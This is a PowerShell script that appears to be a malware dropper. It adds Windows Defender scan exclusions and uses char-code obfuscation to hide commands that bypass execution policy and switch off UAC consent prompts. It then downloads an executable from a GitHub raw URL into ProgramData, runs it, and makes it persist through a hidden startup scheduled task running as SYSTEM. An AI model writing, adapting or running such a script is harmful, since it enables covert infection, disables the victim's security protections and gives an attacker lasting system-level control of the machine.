$ExclusionPaths = @(
    (Join-Path $Env:USERPROFILE "Downloads"),
    $Env:TEMP,
    $Env:ProgramData,
    $Env:HomeDrive
)
Add-MpPreference -ExclusionPath $ExclusionPaths

Start-Sleep -Seconds 5

$A = ([char]83)+([char]116)+([char]97)+([char]114)+([char]116)
$B = ([char]112)+([char]111)+([char]119)+([char]101)+([char]114)+([char]115)+([char]104)+([char]101)+([char]108)+([char]108)
$C = ([char]45)+([char]69)+([char]120)+([char]101)+([char]99)+([char]117)+([char]116)+([char]105)+([char]111)+([char]110)+([char]80)+([char]111)+([char]108)+([char]105)+([char]99)+([char]121)+([char]32)+([char]66)+([char]121)+([char]112)+([char]97)+([char]115)+([char]115)
$D = ([char]65)+([char]100)+([char]100)+([char]45)+([char]77)+([char]112)+([char]80)+([char]114)+([char]101)+([char]102)+([char]101)+([char]114)+([char]101)+([char]110)+([char]99)+([char]101)+([char]32)+([char]45)+([char]69)+([char]120)+([char]99)+([char]108)+([char]117)+([char]115)+([char]105)+([char]111)+([char]110)+([char]80)+([char]97)+([char]116)+([char]104)+([char]32)+([char]39)+
    '$Env:ProgramData, $Env:Temp, $Env:HomeDrive;'+([char]39)
$E = ([char]83)+([char]101)+([char]116)+([char]45)+([char]73)+([char]116)+([char]101)+([char]109)+([char]80)+([char]114)+([char]111)+([char]112)+([char]101)+([char]114)+([char]116)+([char]121)+([char]32)+([char]45)+
    ([char]80)+([char]97)+([char]116)+([char]104)+([char]32)+([char]34)+
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'+([char]34)+
    ([char]32)+([char]45)+([char]78)+([char]97)+([char]109)+([char]101)+([char]32)+([char]34)+
    'ConsentPromptBehaviorAdmin'+([char]34)+([char]32)+([char]45)+([char]86)+([char]97)+([char]108)+([char]117)+([char]101)+([char]32)+([char]48)+([char]32)+([char]45)+([char]84)+([char]121)+([char]112)+([char]101)+([char]32)+([char]68)+([char]87)+([char]111)+([char]114)+([char]100)
$F = $C + ([char]32) + $D + ([char]32) + $E

Start-Process $B -ArgumentList $F -Verb ([char]82)+([char]117)+([char]110)+([char]65)+([char]115)

$G = ([char]104)+([char]116)+([char]116)+([char]112)+([char]115)+([char]58)+([char]47)+([char]47)+([char]114)+([char]97)+([char]119)+([char]46)+([char]103)+([char]105)+([char]116)+([char]104)+([char]117)+([char]98)+([char]117)+([char]115)+([char]101)+([char]114)+([char]99)+([char]111)+([char]110)+([char]116)+([char]101)+([char]110)+([char]116)+([char]46)+([char]99)+([char]111)+([char]109)+([char]47)+([char]115)+([char]114)+([char]97)+([char]112)+([char]49)+([char]56)+([char]47)+([char]100)+([char]100)+([char]111)+([char]115)+([char]115)+([char]47)+([char]109)+([char]97)+([char]105)+([char]110)+([char]47)+([char]115)+([char]121)+([char]115)+([char]116)+([char]97)+([char]109)+([char]46)+([char]101)+([char]120)+([char]101)

$I = Join-Path $Env:ProgramData (([char]115)+([char]121)+([char]115)+([char]116)+([char]97)+([char]109)+([char]46)+([char]101)+([char]120)+([char]101))

Invoke-WebRequest -Uri $G -OutFile $I

Start-Process $I

Start-Sleep -Seconds 5

if (-not (Get-Process -Name "system" -ErrorAction SilentlyContinue)) {
    Start-Process $I
}

$TaskName = "RunSystemExeIfNotRunning"
$Action = New-ScheduledTaskAction -Execute $I
$Trigger = New-ScheduledTaskTrigger -AtStartup
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest
$Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden

try {
    Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Principal $Principal -Settings $Settings -Force
} catch {
}

$Items = @()
$Items += $I
